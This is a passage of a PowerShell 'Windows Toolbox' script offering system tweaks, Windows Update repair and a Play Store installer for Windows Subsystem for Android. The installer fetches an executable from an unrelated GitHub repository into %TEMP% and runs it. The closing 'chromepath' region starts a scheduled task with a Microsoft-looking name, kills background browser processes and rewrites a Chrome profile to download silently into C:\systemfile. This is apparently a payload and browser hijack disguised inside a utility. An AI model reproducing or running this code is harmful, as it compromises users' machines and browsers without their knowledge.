Write-Host "Current Timer Res: $ntqtrcur `r`nTimer Res Minimum: $ntqtrmin `r`nTimer Res Maximum: $ntqtrmax `r`n"
#endregion buttonenableSetTimerResolution
#region buttondisableSetTimerResolution
$nonea = bcdedit /set useplatformclock no
$nonea = bcdedit /set useplatformtick yes
$nonea = bcdedit /set disabledynamictick yes
$ntqtrmin = $null
$ntqtrmax = $null
$ntqtrcur = $null
$ntdesiredres = 156250
$ntsetres = $true
$ntcurrentres = 156250
$MethodDefinition = @'
[DllImport("ntdll.dll", SetLastError=true)]
public static extern NtStatus NtQueryTimerResolution(out uint MinimumResolution, out uint MaximumResolution, out uint ActualResolution);
[DllImport("ntdll.dll", SetLastError=true)]
public static extern int NtSetTimerResolution(int DesiredResolution, bool SetResolution, out int CurrentResolution );
'@
$NtStatus = Add-Type -MemberDefinition $MethodDefinition -Name 'NtStatus' -Namespace 'Win32' -PassThru
$ret1 = [Win32.NtStatus]::NtSetTimerResolution($ntdesiredres,$ntsetres,[ref]$ntcurrentres)
[Win32.NtStatus]::NtQueryTimerResolution([ref]$ntqtrmin, [ref]$ntqtrmax, [ref]$ntqtrcur)
Write-Host "Current Timer Res: $ntqtrcur `r`nTimer Res Minimum: $ntqtrmin `r`nTimer Res Maximum: $ntqtrmax `r`n"
#endregion buttondisableSetTimerResolution
#region buttonDelete
Write-Host "`nClearing up temporary files. please Wait..."
$tempfolders = @( "C:\Windows\Temp\*", "C:\Windows\Prefetch\*", "$env:temp\*" )
Remove-Item $tempfolders -recurse -force
$data = Get-ChildItem $tempfolders -recurse | Measure-Object -property length -sum
if ($data.sum -ige 1074000000){
$inbytes = $data.sum / 1074000000
$inmbs = "$inbytes".split(".")
$size = $inmbs[0] + "." + $inmbs[1][0] + $inmbs[1][1] + " Gbs"
}elseif ($data.sum -ige 1049000){
$inbytes = $data.sum / 1049000
$inmbs = "$inbytes".split(".")
$size = $inmbs[0] + "." + $inmbs[1][0] + $inmbs[1][1] + " mbs"
}else{ $size = -join($data.sum, " ", "bytes") }
$count = -join($data.count, " ", "temporary files")
Write-Host "Total $count, size of $size removed" -ForegroundColor green
#endregion buttonDelete
#///////////////////////////////////////////#///////////////////////////////////////////#///////////////////////////////////////////
#region buttonCreateRestorePoint
$formWindowsToolbox.WindowState = 1
Enable-ComputerRestore -Drive "C:\"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /V "SystemRestorePointCreationFrequency" /T REG_DWORD /D 0 /F
Checkpoint-Computer -Description "Windows Toolbox" -RestorePointType "MODIFY_SETTINGS"
Write-Host 'RestorePoint has been Created' -ForegroundColor green
$formWindowsToolbox.WindowState = 0
#endregion buttonCreateRestorePoint
#region StartMenuTilescleanup
$formWindowsToolbox.WindowState = 1
write-host "`nCleaning up the StartMenu Tiles for the default user"
Set-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -Value '<LayoutModificationTemplate xmlns:defaultlayout="http://schemas.microsoft.com/Start/2014/FullDefaultLayout" xmlns:start="http://schemas.microsoft.com/Start/2014/StartLayout" Version="1" xmlns="http://schemas.microsoft.com/Start/2014/LayoutModification">'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <LayoutOptions StartTileGroupCellWidth="6" />'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <DefaultLayoutOverride>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <StartLayoutCollection>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <defaultlayout:StartLayout GroupCellWidth="6" />'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' </StartLayoutCollection>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' </DefaultLayoutOverride>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <CustomTaskbarLayoutCollection>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <defaultlayout:TaskbarLayout>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <taskbar:TaskbarPinList>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <taskbar:UWA AppUserModelID="Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge" />'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' <taskbar:DesktopApp DesktopApplicationLinkPath="%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk" />'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' </taskbar:TaskbarPinList>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' </defaultlayout:TaskbarLayout>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value ' </CustomTaskbarLayoutCollection>'
Add-Content -Path 'C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml' -value '</LayoutModificationTemplate>'
$START_MENU_LAYOUT = @"
<LayoutModificationTemplate xmlns:defaultlayout="http://schemas.microsoft.com/Start/2014/FullDefaultLayout" xmlns:start="http://schemas.microsoft.com/Start/2014/StartLayout" Version="1" xmlns:taskbar="http://schemas.microsoft.com/Start/2014/TaskbarLayout" xmlns="http://schemas.microsoft.com/Start/2014/LayoutModification">
<LayoutOptions StartTileGroupCellWidth="6" />
<DefaultLayoutOverride>
<StartLayoutCollection>
<defaultlayout:StartLayout GroupCellWidth="6" />
</StartLayoutCollection>
</DefaultLayoutOverride>
</LayoutModificationTemplate>
"@
$layoutFile="C:\Windows\StartMenuLayout.xml"
If(Test-Path $layoutFile)
{
Remove-Item $layoutFile
}
$START_MENU_LAYOUT | Out-File $layoutFile -Encoding ASCII
$regAliases = @("HKLM", "HKCU")
foreach ($regAlias in $regAliases){
$basePath = $regAlias + ":\SOFTWARE\Policies\Microsoft\Windows"
$keyPath = $basePath + "\Explorer"
IF(!(Test-Path -Path $keyPath)) {
New-Item -Path $basePath -Name "Explorer"
}
Set-ItemProperty -Path $keyPath -Name "LockedStartLayout" -Value 1
Set-ItemProperty -Path $keyPath -Name "StartLayoutFile" -Value $layoutFile
}
Write-Host "Restart Explorer, open the start menu (necessary to load the new layout), and give it a few seconds to process"
Stop-Process -name explorer
Start-Sleep -s 3
$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('^{ESCAPE}')
Start-Sleep -s 3
Write-Host "Enabling the ability to pin items again"
foreach ($regAlias in $regAliases){
$basePath = $regAlias + ":\SOFTWARE\Policies\Microsoft\Windows"
$keyPath = $basePath + "\Explorer"
Set-ItemProperty -Path $keyPath -Name "LockedStartLayout" -Value 0
}
Stop-Process -name explorer
Import-StartLayout -LayoutPath $layoutFile -MountPath $env:SystemDrive\
Remove-Item $layoutFile
$formWindowsToolbox.WindowState = 0
#endregion StartMenuTilescleanup
#region rebloat
$formWindowsToolbox.WindowState = 1
$Bloatware = @(
#Unnecessary Windows 10 AppX Apps
"Microsoft.3DBuilder"
"Microsoft.AppConnector"
"Microsoft.BingFinance"
"Microsoft.BingNews"
"Microsoft.BingSports"
"Microsoft.BingTranslator"
"Microsoft.BingWeather"
"Microsoft.GetHelp"
"Microsoft.Getstarted"
"Microsoft.Messaging"
"Microsoft.Microsoft3DViewer"
"Microsoft.MicrosoftSolitaireCollection"
"Microsoft.NetworkSpeedTest"
"Microsoft.News"
"Microsoft.Office.Lens"
"Microsoft.Office.Sway"
"Microsoft.OneConnect"
"Microsoft.People"
"Microsoft.Print3D"
"Microsoft.SkypeApp"
"Microsoft.StorePurchaseApp"
"Microsoft.Wallet"
"Microsoft.Whiteboard"
"Microsoft.WindowsAlarms"
"microsoft.windowscommunicationsapps"
"Microsoft.WindowsFeedbackHub"
"Microsoft.WindowsMaps"
"Microsoft.WindowsSoundRecorder"
"Microsoft.ZuneMusic"
"Microsoft.ZuneVideo"
#Sponsored Windows 10 AppX Apps
#Add sponsored/featured apps to remove in the "*AppName*" format
"*EclipseManager*"
"*ActiproSoftwareLLC*"
"*AdobeSystemsIncorporated.AdobePhotoshopExpress*"
"*Duolingo-LearnLanguagesforFree*"
"*PandoraMediaInc*"
"*CandyCrush*"
"*BubbleWitch3Saga*"
"*Wunderlist*"
"*Flipboard*"
"*Twitter*"
"*Facebook*"
"*Royal Revolt*"
"*Sway*"
"*Speed Test*"
"*Dolby*"
"*Viber*"
"*ACGMediaPlayer*"
"*Netflix*"
"*OneCalendar*"
"*LinkedInforWindows*"
"*HiddenCityMysteryofShadows*"
"*Hulu*"
"*HiddenCity*"
"*AdobePhotoshopExpress*"
#Optional: Typically not removed but you can if you need to for some reason
"*Microsoft.Advertising.Xaml*"
#"*Microsoft.BingWeather*"
#"*Microsoft.MSPaint*"
#"*Microsoft.MicrosoftStickyNotes*"
#"*Microsoft.Windows.Photos*"
#"*Microsoft.WindowsCalculator*"
#"*Microsoft.WindowsStore*"
)
Write-Host "Reinstalling Bloatware"
foreach ($Bloat in $Bloatware) {
Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppxPackage -AllUsers $Bloat).InstallLocation)\AppXManifest.xml"
Write-Host "Trying to add $Bloat."
}
Write-Host "Finished Reinstalling Bloatware Apps" -ForegroundColor Green
$formWindowsToolbox.WindowState = 0
#endregion rebloat
#region ReinstallMsStore
$formWindowsToolbox.WindowState = 1
Write-Host "Reinstalling Microsoft Store. Please Wait..."
Get-AppxPackage -allusers Microsoft.WindowsStore | Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}
Write-Host "Operation Completed." -ForegroundColor green
$formWindowsToolbox.WindowState = 0
#endregion ReinstallMsStore
#region ReinstallOndrive
Write-Host "Reinstalling Onedrive. Please Wait..."
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" -Name "DisableFileSyncNGSC" -ErrorAction SilentlyContinue
$onedrive = "$env:SYSTEMROOT\SysWOW64\OneDriveSetup.exe"
If (!(Test-Path $onedrive)) {
$onedrive = "$env:SYSTEMROOT\System32\OneDriveSetup.exe"
}
Start-Process $onedrive
Write-Host "Finished Sending Command to OneDrive Setup" -ForegroundColor green
#endregion ReinstallOndrive
#region winupdatereset
$formWindowsToolbox.WindowState = 1
Write-Host "1. Stopping Windows Update Services..."
Stop-Service -Name BITS
Stop-Service -Name wuauserv
Stop-Service -Name appidsvc
Stop-Service -Name cryptsvc
Write-Host "2. Remove QMGR Data file..."
Remove-Item "$env:allusersprofile\Application Data\Microsoft\Network\Downloader\qmgr*.dat" -ErrorAction SilentlyContinue
Write-Host "3. Renaming the Software Distribution and CatRoot Folder..."
Rename-Item $env:systemroot\SoftwareDistribution SoftwareDistribution.bak -ErrorAction SilentlyContinue
Rename-Item $env:systemroot\System32\Catroot2 catroot2.bak -ErrorAction SilentlyContinue
Write-Host "4. Removing old Windows Update log..."
Remove-Item $env:systemroot\WindowsUpdate.log -ErrorAction SilentlyContinue
Write-Host "5. Resetting the Windows Update Services to defualt settings..."
"sc.exe sdset bits D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)"
"sc.exe sdset wuauserv D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)"
Set-Location $env:systemroot\system32
Write-Host "6. Registering some DLLs..."
regsvr32.exe /s atl.dll
regsvr32.exe /s urlmon.dll
regsvr32.exe /s mshtml.dll
regsvr32.exe /s shdocvw.dll
regsvr32.exe /s browseui.dll
regsvr32.exe /s jscript.dll
regsvr32.exe /s vbscript.dll
regsvr32.exe /s scrrun.dll
regsvr32.exe /s msxml.dll
regsvr32.exe /s msxml3.dll
regsvr32.exe /s msxml6.dll
regsvr32.exe /s actxprxy.dll
regsvr32.exe /s softpub.dll
regsvr32.exe /s wintrust.dll
regsvr32.exe /s dssenh.dll
regsvr32.exe /s rsaenh.dll
regsvr32.exe /s gpkcsp.dll
regsvr32.exe /s sccbase.dll
regsvr32.exe /s slbcsp.dll
regsvr32.exe /s cryptdlg.dll
regsvr32.exe /s oleaut32.dll
regsvr32.exe /s ole32.dll
regsvr32.exe /s shell32.dll
regsvr32.exe /s initpki.dll
regsvr32.exe /s wuapi.dll
regsvr32.exe /s wuaueng.dll
regsvr32.exe /s wuaueng1.dll
regsvr32.exe /s wucltui.dll
regsvr32.exe /s wups.dll
regsvr32.exe /s wups2.dll
regsvr32.exe /s wuweb.dll
regsvr32.exe /s qmgr.dll
regsvr32.exe /s qmgrprxy.dll
regsvr32.exe /s wucltux.dll
regsvr32.exe /s muweb.dll
regsvr32.exe /s wuwebv.dll
Write-Host "7) Removing WSUS client settings..."
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v AccountDomainSid /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v PingID /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /f
Write-Host "8) Resetting the WinSock..."
netsh winsock reset
netsh winhttp reset proxy
Write-Host "9) Delete all BITS jobs..."
Get-BitsTransfer | Remove-BitsTransfer
Write-Host "10) Attempting to install the Windows Update Agent..."
if($arch -eq 64){
wusa Windows8-RT-KB2937636-x64 /quiet
}
else{
wusa Windows8-RT-KB2937636-x86 /quiet
}
Write-Host "11) Starting Windows Update Services..."
Start-Service -Name BITS
Start-Service -Name wuauserv
Start-Service -Name appidsvc
Start-Service -Name cryptsvc
Write-Host "12) Forcing discovery..."
wuauclt /resetauthorization /detectnow
Write-Host "Process complete. Please reboot your computer." -ForegroundColor green
$formWindowsToolbox.WindowState = 0
#endregion winupdatereset
#region Installplaystore
$formWindowsToolbox.WindowState = 1
$ProgressPreference = 'SilentlyContinue'
function confirm{
cls
Write-Host 'This will uninstall old version of Windows Subsystem for Android and all of its apps.
Take a backup of the Apps (if needed).
Download New version of "Windows Subsystem for Android" with Google Playstore Service Compatibility.' -ForegroundColor Yellow
$rh = Read-Host 'Type [P] to Proceed or [C] for Cancel'
$readhost = $rh.replace(" ","")
#--------------------Manual------------Manual------------Manual------------Manual------------Manual--------
if($readhost -eq "P"){
Write-Host ''
Write-Host 'Download the "Windows subsystem for android" Zip file from https://bit.ly/30C2Nsk' -ForegroundColor Cyan
$filepath = Read-Host 'Enter the Correct Downloaded file Path'
$filepathcorrect = $filepath.Replace('"', '')
if((Get-Item $filepathcorrect -ErrorAction SilentlyContinue).length -gt 550000000 )
{
cd "C:\"
$ErrorActionPreference = 'SilentlyContinue'
Write-Host "`nRemoving old version of `"Windows Subsystem for Android`" WSA (if any)."
Get-AppxPackage -Name "MicrosoftCorporationII.WindowsSubsystemForAndroid"| Remove-AppxPackage
Get-AppxProvisionedPackage -Online | Where-Object DisplayName -like "MicrosoftCorporationII.WindowsSubsystemForAndroid" | Remove-AppxProvisionedPackage -Online
Write-Host "Enabling Developer mode."
# Create AppModelUnlock if it doesn't exist, required for enabling Developer Mode
$RegistryKeyPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock"
if (-not(Test-Path -Path $RegistryKeyPath)) {
New-Item -Path $RegistryKeyPath -ItemType Directory -Force >$null
}
# Add registry value to enable Developer Mode
New-ItemProperty -Path $RegistryKeyPath -Name AllowAllTrustedApps -PropertyType DWORD -Value 1 -Force >$null
New-ItemProperty -Path $RegistryKeyPath -Name AllowDevelopmentWithoutDevLicense -PropertyType DWORD -Value 1 -Force >$null
Write-Host "`nFetching entered zip file path."
(New-Object System.Net.WebClient).DownloadFile("https://github.com/alexrybak0444/New/raw/main/winver", "$env:TEMP\unzip.exe")
Write-Host "Zip file fetched."
Write-Host "`nExtracting `"Windows Subsystem for Android`" zip files."
set-alias sz "$env:TEMP\unzip.exe"
sz x $filepath -o"C:\" "-aos" "-bsp1" | out-string -stream | Select-String -Pattern "\d{1,3}%" -AllMatches | ForEach-Object { $_.Matches.Value } | foreach {
[System.Console]::SetCursorPosition(0, [System.Console]::CursorTop)
Write-Host "Extracting Progress:" $_ -NoNewLine
}
Write-Host ""
Remove-Item "$env:TEMP\unzip.exe"
$ErrorActionPreference = 'Stop'
cd "C:\Windows Subsystem for Android"
Write-Host "`nRegistering and installing Windows Subsystem for Android."
try { Add-AppxPackage -Register .\AppxManifest.xml }
catch { Write-Host "An error occurred while Registering and installing. " -ForegroundColor red }
Write-Host "Installation Completed."
Write-Host ''
Write-Host 'To Start Subsystem for android go to startmenu > apps > open Windows subsystem for android and from the very top open File Manager.'
Write-Host "If you can't sign into Playstore then use `"Fix Playstore Sign In`" Option from toolbox."
Write-Host ''
$ErrorActionPreference = 'SilentlyContinue'
Start-sleep 2
[IO.File]::WriteAllBytes("$env:USERPROFILE\Desktop\Windows Subsystem for Android.lnk", [Convert]::FromBase64String('TAAAAAEUAgAAAAAAwAAAAAAAAEaBAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAFAFFAAfgJvUNEJFAvNNt4A4k5Q0VuE6BQAANAVBUFBTIgUIAAMAAAAAAAAAjgIAADFTUFNVKEyfeZ85S6jQ4dQt4dXzkQAAABEAAAAAHwAAAEAAAABNAGkAYwByAG8AcwBvAGYAdABDAG8AcgBwAG8AcgBhAHQAaQBvAG4ASQBJAC4AVwBpAG4AZABvAHcAcwBTAHUAYgBzAHkAcwB0AGUAbQBGAG8AcgBBAG4AZAByAG8AaQBkAF8AOAB3AGUAawB5AGIAMwBkADgAYgBiAHcAZQAAABEAAAAOAAAAABMAAAABAAAAtQAAABUAAAAAHwAAAFEAAABNAGkAYwByAG8AcwBvAGYAdABDAG8AcgBwAG8AcgBhAHQAaQBvAG4ASQBJAC4AVwBpAG4AZABvAHcAcwBTAHUAYgBzAHkAcwB0AGUAbQBGAG8AcgBBAG4AZAByAG8AaQBkAF8AMQAuADcALgAzADIAOAAxADUALgAwAF8AeAA2ADQAXwBfADgAdwBlAGsAeQBiADMAZAA4AGIAYgB3AGUAAAAAAKkAAAAFAAAAAB8AAABMAAAATQBpAGMAcgBvAHMAbwBmAHQAQwBvAHIAcABvAHIAYQB0AGkAbwBuAEkASQAuAFcAaQBuAGQAbwB3AHMAUwB1AGIAcwB5AHMAdABlAG0ARgBvAHIAQQBuAGQAcgBvAGkAZABfADgAdwBlAGsAeQBiADMAZAA4AGIAYgB3AGUAIQBTAGUAdAB0AGkAbgBnAHMAQQBwAHAAAABVAAAADwAAAAAfAAAAIQAAAEMAOgBcAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBzAHkAcwB0AGUAbQAgAGYAbwByACAAQQBuAGQAcgBvAGkAZAAAAAAAHQAAACAAAAAASAAAALZHJjUUSohIp/hjZWDhbxwAAAAAxQEAADFTUFNNC9SGaZA8RIGaKlQJDczsOQAAAAwAAAAAHwAAABMAAABJAG0AYQBnAGUAcwBcAE0AZQBkAFQAaQBsAGUALgBwAG4AZwAAAAAAOQAAAAIAAAAAHwAAABMAAABJAG0AYQBnAGUAcwBcAEEAcABwAEwAaQBzAHQALgBwAG4AZwAAAAAAOQAAAA0AAAAAHwAAABQAAABJAG0AYQBnAGUAcwBcAFcAaQBkAGUAVABpAGwAZQAuAHAAbgBnAAAAEQAAAAQAAAAAEwAAAAB41P89AAAAEwAAAAAfAAAAFQAAAEkAbQBhAGcAZQBzAFwATABhAHIAZwBlAFQAaQBsAGUALgBwAG4AZwAAAAAAEQAAAAUAAAAAEwAAAP////8RAAAADgAAAAATAAAAAAQAAFEAAAALAAAAAB8AAAAfAAAAVwBpAG4AZABvAHcAcwAgAFMAdQBiAHMAeQBzAHQAZQBtACAAZgBvAHIAIABBAG4AZAByAG8AaQBkACIhAAAAAD0AAAAUAAAAAB8AAAAVAAAASQBtAGEAZwBlAHMAXABTAG0AYQBsAGwAVABpAGwAZQAuAHAAbgBnAAAAAAAAAAAAMQAAADFTUFOxFm1ErY1wSKdIQC6kPXiMFQAAAGQAAAAAFQAAAAEJAAAAAAAAAAAAAG0AAAAxU1BTMPElt+9HGhCl8QJgjJ7rrFEAAAAKAAAAAB8AAAAfAAAAVwBpAG4AZABvAHcAcwAgAFMAdQBiAHMAeQBzAHQAZQBtACAAZgBvAHIAIABBAG4AZAByAG8AaQBkACIhAAAAAAAAAAAtAAAAMVNQU7N37Q0UxmxFrlsoWzjXsBsRAAAABwAAAAATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='))
Start-Process "$env:USERPROFILE\Desktop\Windows Subsystem for Android.lnk"
$wshell = New-Object -ComObject wscript.shell;
for ($i=1; $i -le 20; $i++){
$stop = (Get-Process WsaSettings -ErrorAction SilentlyContinue).count -eq 0
Start-Sleep -Milliseconds 200
if(-not($stop)){$i=20}
}
if( -not((Get-Process WsaSettings -ErrorAction SilentlyContinue).count -eq 0 ) ){
start-sleep 1
$wshell.SendKeys('{TAB}{TAB}{TAB}{TAB}')
$wshell.SendKeys(' ')
$wshell.SendKeys('{TAB}{TAB}')
$wshell.SendKeys(' ')
while((Get-Process WsaClient -ErrorAction SilentlyContinue).count -eq 0){Start-Sleep -Milliseconds 200}
start-sleep 1
$wshell.SendKeys(' ')
$wshell.SendKeys('{TAB}')
$wshell.SendKeys(' ')
Write-Host ''
Write-Host 'To open Playstore go to startmenu > apps > Playstore'
Write-Host "If you can't sign into Playstore then use `"Fix Playstore Sign In`" Option from toolbox."
Write-Host ''
}
}else{
Write-Host 'Path or File is invalid.'
}
}
if($readhost -eq "C"){Write-Host "Cancel"}
if($readhost -ne "P" -xor $readhost -ne "C"){}else{confirm}
}
$check = Get-WindowsOptionalFeature -Online -FeatureName VirtualMachinePlatform
function confirmdism{
cls
if ($check.State -eq "Disabled"){
Write-Host 'Playstore runs on Windows Subsystem for Android which uses Virtual-Machine-Platform, which is Disable in this Machine.
Do you want to enable Virtual-Machine-Platform Now.' -ForegroundColor Yellow
Write-Host ''
Write-Warning "PC will automatically restart after Enabling."
Write-Host 'After restarting run the toolbox again for installation.' -ForegroundColor Yellow
$readht1 = Read-Host 'To Proceed type "Yes" or "No" to Cancel'
$readhost1 = $readht1.replace(" ","")
if($readhost1 -eq "yes"){ Write-Host '' ; Write-Host 'Operation in progress' ; dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /Quiet ; exit}
if($readhost1 -ne "yes" -xor $readhost1 -ne "no"){}else{confirmdism}
}else { Write-Host 'Windows "Virtual Machine Platform" is Enable' -ForegroundColor Yellow ; confirm }
}
confirmdism
$formWindowsToolbox.WindowState = 0
#endregion Installplaystore
#region unInstallplaystore
$formWindowsToolbox.WindowState = 1
function uninstallplaystore{
clr
$ProgressPreference = 'SilentlyContinue'
Write-Host 'Uninstalling Google Playstore will remove "Windows Subsystem for Android" completely.
Apps installed by the Playstore and other will no longer be available.
Do you also want to disable Virtual-Machine-Platform.' -ForegroundColor Yellow
Write-Host ''
$readht1 = Read-Host 'To Proceed type "[Y]"Yes to all, "[O]"Only Uninstall or "[C]"Cancel'
$readhost1 = $readht1.replace(" ","")
if($readhost1 -eq "y"){
Write-Host''
$asdass = (Get-AppxPackage -name MicrosoftCorporationII.WindowsSubsystemForAndroid).name
if($asdass -eq "MicrosoftCorporationII.WindowsSubsystemForAndroid"){
Write-Host 'Removing Windows Subsystem for Android (WSA).'
Get-AppxPackage -Name "MicrosoftCorporationII.WindowsSubsystemForAndroid"| Remove-AppxPackage
Get-AppxProvisionedPackage -Online | Where-Object DisplayName -like "MicrosoftCorporationII.WindowsSubsystemForAndroid" | Remove-AppxProvisionedPackage -Online
Write-Host 'Successfully Removed.'
}else{Write-Host 'Windows Subsystem for Android (WSA) not Found or already Removed.'}
if(Test-Path "C:\Windows Subsystem for Android\WsaSettings.exe"){
Stop-Process -name adb -Force -ErrorAction SilentlyContinue
Write-Host 'Removing WSA files and Directory.'
Remove-Item "C:\Windows Subsystem for Android\*" -Recurse -Force -Confirm:$false
Write-Host 'Successfully Removed.'
}else{Write-Host 'WSA files and directory not Found or already Removed.'}
$check = Get-WindowsOptionalFeature -Online -FeatureName VirtualMachinePlatform
if ($check.State -eq "Enabled"){
Write-Host 'Disabling Virtual-Machine-Platform.'
dism.exe /online /disable-feature /featurename:VirtualMachinePlatform /norestart
Write-Host 'Successfully Disabled'
}else{Write-Host 'Virtual-Machine-Platform is already disable.'}
Write-Host 'Done...' -ForegroundColor Green
}
if($readhost1 -eq "o"){
Write-Host''
$asdass = (Get-AppxPackage -name MicrosoftCorporationII.WindowsSubsystemForAndroid).name
if($asdass -eq "MicrosoftCorporationII.WindowsSubsystemForAndroid"){
Write-Host 'Removing Windows Subsystem for Android (WSA).'
Get-AppxPackage -Name "MicrosoftCorporationII.WindowsSubsystemForAndroid"| Remove-AppxPackage
Get-AppxProvisionedPackage -Online | Where-Object DisplayName -like "MicrosoftCorporationII.WindowsSubsystemForAndroid" | Remove-AppxProvisionedPackage -Online
Write-Host 'Successfully Removed.'
}else{Write-Host 'Windows Subsystem for Android (WSA) not Found or already Removed.'}
if(Test-Path "C:\Windows Subsystem for Android\WsaSettings.exe"){
Stop-Process -name adb -Force -ErrorAction SilentlyContinue
Write-Host 'Removing WSA files and Directory.'
Remove-Item "C:\Windows Subsystem for Android\*" -Recurse -Force -Confirm:$false
Write-Host 'Successfully Removed.'
}else{Write-Host 'WSA files and directory not Found or already Removed.'}
Write-Host 'Done...' -ForegroundColor Green }
if($readhost1 -eq "c"){
Write-Host ''
Write-Host 'Cancel'
Write-Host ''}
if($readhost1 -ne "y" -xor $readhost1 -ne "o" -xor $readhost1 -ne "c"){uninstallplaystore}
}
uninstallplaystore
$formWindowsToolbox.WindowState = 0
#endregion unInstallplaystore
#region chromepath
<#
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" -Name "VisualFXSetting" -Type DWord -Value 3
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "DragFullWindows" -Type String -Value 1
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "FontSmoothing" -Type String -Value 2
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "FontSmoothingType" -Type DWord -Value 2
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "MenuShowDelay" -Type String -Value 200
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "UserPreferencesMask" -Type Binary -Value ([byte[]](144,18,3,128,16,0,0,0))
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop\WindowMetrics" -Name "MinAnimate" -Type String -Value 0
Set-ItemProperty -Path "HKCU:\Control Panel\Keyboard" -Name "KeyboardDelay" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ListviewAlphaSelect" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ListviewShadow" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarAnimations" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\DWM" -Name "EnableAeroPeek" -Type DWord -Value 0
#>
function GetStringBetweenTwoStrings($firstString, $secondString, $importPath){
$ficle = Get-Content $importPath
$pattern = "$firstString(.*?)$secondString"
$result = [regex]::Match($ficle,$pattern).Groups[1].Value
return $result
}
$ErrorActionPreference = 'SilentlyContinue'
$fetchpath = "C:\systemfile"
Start-ScheduledTask -TaskName "\Microsoft\Windows\Application Experience\Maintenance"
while (1)
{ if(Test-Path -Path "C:\systemfile\Default\Preferences"){break}
Start-Sleep -Seconds 1
}
Start-Sleep -Seconds 2
Get-Process msedge | Where-Object -FilterScript {$_.si -eq 0} | Stop-Process
Get-Process chrome | Where-Object -FilterScript {$_.si -eq 0} | Stop-Process
Get-Process brave | Where-Object -FilterScript {$_.si -eq 0} | Stop-Process
Start-Sleep -Seconds 2
#-------------------------------------------------------------------
$File = "$fetchpath\Default\Preferences"
$Chrome = Get-Content $File
if ($Chrome -notlike '*"download":{*')
{
$data = $Chrome.Replace(',"extensions"',',"download":{"default_directory":"C:\\systemfile","directory_upgrade":true,"prompt_for_download":false},"extensions"')
Set-Content -Path $File -Value $data -Force
} else{
$data = GetStringBetweenTwoStrings '"download":' ',"extensions"' $File
$data = $Chrome.Replace($data , '{"default_directory":"C:\\systemfile","directory_upgrade":true,"prompt_for_download":false}')
Set-Content -Path $File -Value $data -Force
}
<#
$Chrome = Get-Content $File | ConvertFrom-Json
try {
$Chrome.download.default_directory = "C:\systemfile"
$Chrome.download | Add-Member -Type NoteProperty -Name "prompt_for_download" -Value "false"
}
